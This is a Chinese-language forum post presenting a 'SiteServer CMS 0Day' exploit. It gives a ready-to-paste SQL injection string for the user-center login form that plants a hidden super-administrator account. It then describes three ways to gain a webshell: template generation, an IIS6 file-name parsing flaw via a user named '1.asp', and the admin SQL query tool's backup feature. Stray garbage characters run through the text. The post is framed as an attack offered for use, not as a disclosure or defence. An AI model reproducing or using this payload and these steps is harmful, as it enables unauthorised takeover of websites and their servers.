SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

! U8 W, K9 P# u2 C+ s7 Wstieserver官网:www.siteserver.cn
/ M7 o, f% n) N6 l. M
4 F4 q6 ]- S2 N0 s% V* F
; T0 E7 _; G; |  }
: @/ p- k3 Y, g* `. y! f* pEXP:

直接访问UserCenter/login.aspx
- F+ j6 K4 ~* _7 p

7 L# v$ l1 r  z) E/ C( h/ N
用户名处输入：
; F& @) T) A( \
- }- R; U; o6 }123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
0 m3 H/ J* v; h* F6 S( C( z
+ V& N) x5 {% ?# I; `2 D
& m: p) }6 r+ D0 D; d; W( ]
$ S/ n  O' p0 h6 J/ w# V) v2 b. V密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
* y  E  s7 M2 i" j7 k  u( T
. g0 R# W) n# g* _7 M# r' {
8 x6 p/ a% \9 _$ }
之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 K6 K  N4 m/ ^$ u
6 H8 y+ q3 r) }1 Z& Y

后台拿webshell的三种方法：

- ?9 r$ C; w7 Z6 f) A! Q1 C" k1 Y7 ^一、

9 S8 g' D2 L) X: G: d; H8 T$ ?) n$ }站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
( X: v! Q* t0 I9 Q7 A
, Q; u$ D( G; a' ~. P# l二、

成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
  G6 o$ ^$ Y. }2 I7 G9 N: v
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、
* V6 ?; L$ B! C: W8 |& ~2 d
( W8 }$ A/ Z. c: q: [" |5 c系统工具-》实用工具-》机器参数查看
. ?9 V! m3 V5 k' x5 Q" j% G可以看到数据库类型、名称，WEB路径
5 I& D6 P9 ?! Q7 ~. Z6 V" g' |
+ P6 c; t6 d* ]. A系统工具-》数据库工具-》SQL语句查询
0 K  E" O: N  v* g这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

  F) m% E# i* j